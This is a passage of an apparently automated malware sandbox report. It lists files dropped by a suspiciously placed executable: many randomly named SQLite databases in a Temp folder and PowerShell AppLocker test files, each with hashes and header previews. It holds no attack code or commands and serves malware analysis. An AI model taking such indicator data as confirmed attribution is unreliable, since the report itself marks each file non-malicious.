                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\X5HeN8TIJ8

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\XPczw8NIzs

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\XTGYFZ8b87

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Xd3z8b9Imt

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Xkf6GPael4

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\XznqT9q6mw

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\YNPFwgikfN

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\YOYYQgkmNP

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Yi0eBqEScn

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\YkxZureltn

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\YyNdQO7oaw

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Z3tniEAHBZ

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Z8eh4A3lwq

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ZB1YitlsvJ

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ZOzuWkhAA9

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ZSPkkmoOYn

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ZVcGsQOBjY

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ZdJTPnbHJh

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ZvZOcGZs5I

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Zy0qWRQwFw

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0piihyu2.y05.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0reb5ltw.iuj.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13f5ijui.x32.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
